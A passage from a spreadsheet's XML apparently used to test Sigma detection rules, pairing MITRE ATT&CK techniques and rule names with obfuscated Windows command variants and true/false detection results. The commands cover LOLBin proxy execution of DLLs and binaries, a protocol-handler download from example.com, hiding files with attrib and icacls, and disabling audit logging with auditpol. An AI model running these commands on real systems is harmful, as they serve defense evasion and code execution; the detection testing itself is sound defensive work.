          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E3440" s="44" t="inlineStr">
        <is>
          <t>iexpress.exe /n	C:\Temp\package.sed</t>
        </is>
      </c>
      <c r="F3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3440" s="44" t="n"/>
      <c r="J3440" s="44" t="n"/>
      <c r="K3440" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3441" ht="15.75" customHeight="1" s="42">
      <c r="A3441" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C3441" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D3441" s="44" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E3441" s="44" t="inlineStr">
        <is>
          <t>iexpress.exe "/n" C:\Temp\package.sed</t>
        </is>
      </c>
      <c r="F3441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3441" s="44" t="n"/>
      <c r="J3441" s="44" t="n"/>
      <c r="K3441" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3442" ht="15.75" customHeight="1" s="42">
      <c r="A3442" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3442" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iexpress_susp_execution</t>
        </is>
      </c>
      <c r="C3442" s="44" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location</t>
        </is>
      </c>
      <c r="D3442" s="44" t="inlineStr">
        <is>
          <t>b2b048b0-7857-4380-b0fb-d3f0ab820b71</t>
        </is>
      </c>
      <c r="E3442" s="44" t="inlineStr">
        <is>
          <t>iexpress.exe /n C:\Users\Public\..\Temp\package.sed</t>
        </is>
      </c>
      <c r="F3442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3442" s="44" t="n"/>
      <c r="J3442" s="44" t="n"/>
      <c r="K3442" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3443" ht="15.75" customHeight="1" s="42">
      <c r="A3443" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3443" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C3443" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D3443" s="44" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E3443" s="44" t="inlineStr">
        <is>
          <t>OpenWith.exe -c C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3443" s="44" t="n"/>
      <c r="J3443" s="44" t="n"/>
      <c r="K3443" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3444" ht="15.75" customHeight="1" s="42">
      <c r="A3444" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3444" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3444" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3444" s="44" t="inlineStr">
        <is>
          <t>pcwrun.exe .."/".."/"Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3444" s="44" t="n"/>
      <c r="J3444" s="44" t="n"/>
      <c r="K3444" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3445" ht="15.75" customHeight="1" s="42">
      <c r="A3445" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3445" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C3445" s="44" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D3445" s="44" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E3445" s="44" t="inlineStr">
        <is>
          <t>rasautou.exe "-d" C:\Windows\Temp\test.dll "-p" DllMain</t>
        </is>
      </c>
      <c r="F3445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3445" s="44" t="n"/>
      <c r="J3445" s="44" t="n"/>
      <c r="K3445" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3446" ht="15.75" customHeight="1" s="42">
      <c r="A3446" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C3446" s="44" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D3446" s="44" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E3446" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //B "C:\Windows\System32\register_app.vbs" "-reg""ister" COMPlusApp Name C:\path\to\provider.dll</t>
        </is>
      </c>
      <c r="F3446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3446" s="44" t="n"/>
      <c r="J3446" s="44" t="n"/>
      <c r="K3446" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3447" ht="15.75" customHeight="1" s="42">
      <c r="A3447" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C3447" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D3447" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E3447" s="44" t="inlineStr">
        <is>
          <t>sftp.exe -D C:/Windows/System32/calc.exe user@host</t>
        </is>
      </c>
      <c r="F3447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3447" s="44" t="n"/>
      <c r="J3447" s="44" t="n"/>
      <c r="K3447" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3448" ht="15.75" customHeight="1" s="42">
      <c r="A3448" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3448" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3448" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3448" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3448" s="44" t="inlineStr">
        <is>
          <t>unregmp2.exe "/HideWMP"</t>
        </is>
      </c>
      <c r="F3448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3448" s="44" t="n"/>
      <c r="J3448" s="44" t="n"/>
      <c r="K3448" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3449" ht="15.75" customHeight="1" s="42">
      <c r="A3449" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C3449" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D3449" s="44" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E3449" s="44" t="inlineStr">
        <is>
          <t>cscript.exe register_app.vbs /register AppName DllPath</t>
        </is>
      </c>
      <c r="F3449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3449" s="44" t="n"/>
      <c r="J3449" s="44" t="n"/>
      <c r="K3449" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3450" ht="15.75" customHeight="1" s="42">
      <c r="A3450" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C3450" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D3450" s="44" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E3450" s="44" t="inlineStr">
        <is>
          <t>cscript.exe "register_app.vbs" -register AppName DllPath</t>
        </is>
      </c>
      <c r="F3450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3450" s="44" t="n"/>
      <c r="J3450" s="44" t="n"/>
      <c r="K3450" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3451" ht="15.75" customHeight="1" s="42">
      <c r="A3451" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C3451" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D3451" s="44" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E3451" s="44" t="inlineStr">
        <is>
          <t>cscript.exe register_app.vbs	-register AppName DllPath</t>
        </is>
      </c>
      <c r="F3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3451" s="44" t="n"/>
      <c r="J3451" s="44" t="n"/>
      <c r="K3451" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3452" ht="15.75" customHeight="1" s="42">
      <c r="A3452" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C3452" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D3452" s="44" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E3452" s="44" t="inlineStr">
        <is>
          <t>cscript.exe register_app.vbs -register:AppName DllPath</t>
        </is>
      </c>
      <c r="F3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3452" s="44" t="n"/>
      <c r="J3452" s="44" t="n"/>
      <c r="K3452" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3453" ht="15.75" customHeight="1" s="42">
      <c r="A3453" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C3453" s="44" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D3453" s="44" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E3453" s="44" t="inlineStr">
        <is>
          <t>cscript.exe register_app.vbs   -register AppName DllPath</t>
        </is>
      </c>
      <c r="F3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3453" s="44" t="n"/>
      <c r="J3453" s="44" t="n"/>
      <c r="K3453" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3454" ht="15.75" customHeight="1" s="42">
      <c r="A3454" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3454" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C3454" s="44" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D3454" s="44" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E3454" s="44" t="inlineStr">
        <is>
          <t>print  "/D:\\\"C:\\\\program files\\\\\\\print.exe"</t>
        </is>
      </c>
      <c r="F3454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3454" s="44" t="n"/>
      <c r="J3454" s="44" t="n"/>
      <c r="K3454" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3455" ht="15.75" customHeight="1" s="42">
      <c r="A3455" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3455" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C3455" s="44" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D3455" s="44" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E3455" s="44" t="inlineStr">
        <is>
          <t>print /D:C:\\program files\\print.exe</t>
        </is>
      </c>
      <c r="F3455" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3455" s="44" t="n"/>
      <c r="J3455" s="44" t="n"/>
      <c r="K3455" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3456" ht="15.75" customHeight="1" s="42">
      <c r="A3456" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C3456" s="44" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D3456" s="44" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E3456" s="44" t="inlineStr">
        <is>
          <t>print /D "C:\program files\print"</t>
        </is>
      </c>
      <c r="F3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3456" s="44" t="n"/>
      <c r="J3456" s="44" t="n"/>
      <c r="K3456" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3457" ht="15.75" customHeight="1" s="42">
      <c r="A3457" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C3457" s="44" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D3457" s="44" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E3457" s="44" t="inlineStr">
        <is>
          <t>print  /D "C:\\\program files\\print.exe"</t>
        </is>
      </c>
      <c r="F3457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3457" s="44" t="n"/>
      <c r="J3457" s="44" t="n"/>
      <c r="K3457" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3458" ht="15.75" customHeight="1" s="42">
      <c r="A3458" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C3458" s="44" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D3458" s="44" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E3458" s="44" t="inlineStr">
        <is>
          <t>%COMSPEC% /c print /D "C:\\program files\\print.exe"</t>
        </is>
      </c>
      <c r="F3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3458" s="44" t="n"/>
      <c r="J3458" s="44" t="n"/>
      <c r="K3458" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3459" ht="15.75" customHeight="1" s="42">
      <c r="A3459" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C3459" s="44" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D3459" s="44" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E3459" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SOFTWARE\Microsoft\Provisioning""\Commands\LOLBin\dummy1" /v altitude /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3459" s="44" t="n"/>
      <c r="J3459" s="44" t="n"/>
      <c r="K3459" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3460" ht="15.75" customHeight="1" s="42">
      <c r="A3460" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C3460" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D3460" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E3460" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "start ms-appinstaller://?"source"=http://example.com/package.appinstaller"</t>
        </is>
      </c>
      <c r="F3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3460" s="44" t="n"/>
      <c r="J3460" s="44" t="n"/>
      <c r="K3460" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3461" ht="15.75" customHeight="1" s="42">
      <c r="A3461" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3461" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3461" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3461" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3461" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /UpdateDeploymentProvider UpdateDeploymentProvider.dll  /RunHandlerComServer</t>
        </is>
      </c>
      <c r="F3461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3461" s="44" t="n"/>
      <c r="J3461" s="44" t="n"/>
      <c r="K3461" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3462" ht="15.75" customHeight="1" s="42">
      <c r="A3462" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C3462" s="44" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D3462" s="44" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E3462" s="44" t="inlineStr">
        <is>
          <t>attrib.exe "+h" C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F3462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3462" s="44" t="n"/>
      <c r="J3462" s="44" t="n"/>
      <c r="K3462" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3463" ht="15.75" customHeight="1" s="42">
      <c r="A3463" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C3463" s="44" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D3463" s="44" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E3463" s="44" t="inlineStr">
        <is>
          <t>attrib.exe	+h	C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F3463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3463" s="44" t="n"/>
      <c r="J3463" s="44" t="n"/>
      <c r="K3463" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3464" ht="15.75" customHeight="1" s="42">
      <c r="A3464" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C3464" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D3464" s="44" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E3464" s="44" t="inlineStr">
        <is>
          <t>attrib.exe "+s" C:\Users\thaim\AppData\Local\Temp\T1564.001.exe</t>
        </is>
      </c>
      <c r="F3464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3464" s="44" t="n"/>
      <c r="J3464" s="44" t="n"/>
      <c r="K3464" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3465" ht="15.75" customHeight="1" s="42">
      <c r="A3465" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C3465" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D3465" s="44" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E3465" s="44" t="inlineStr">
        <is>
          <t>attrib.exe	+s C:\Users\thaim\AppData\Local\Temp\T1564.001.exe</t>
        </is>
      </c>
      <c r="F3465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3465" s="44" t="n"/>
      <c r="J3465" s="44" t="n"/>
      <c r="K3465" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3466" ht="15.75" customHeight="1" s="42">
      <c r="A3466" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3466" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3466" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3466" s="44" t="inlineStr">
        <is>
          <t>icacls.exe "C:\Users\Public\test.exe" -deny *S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F3466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3466" s="44" t="n"/>
      <c r="J3466" s="44" t="n"/>
      <c r="K3466" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3467" ht="15.75" customHeight="1" s="42">
      <c r="A3467" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3467" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3467" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3467" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3467" s="44" t="inlineStr">
        <is>
          <t>icacls.exe "C:\Users\Public\test.exe" /deny Everyone:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F3467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3467" s="44" t="n"/>
      <c r="J3467" s="44" t="n"/>
      <c r="K3467" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3468" ht="15.75" customHeight="1" s="42">
      <c r="A3468" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C3468" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D3468" s="44" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E3468" s="44" t="inlineStr">
        <is>
          <t>auditpol.exe -logon:none</t>
        </is>
      </c>
      <c r="F3468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3468" s="44" t="n"/>
      <c r="J3468" s="44" t="n"/>
      <c r="K3468" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3469" ht="15.75" customHeight="1" s="42">
      <c r="A3469" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3469" s="44" t="inlineStr">
        <is>
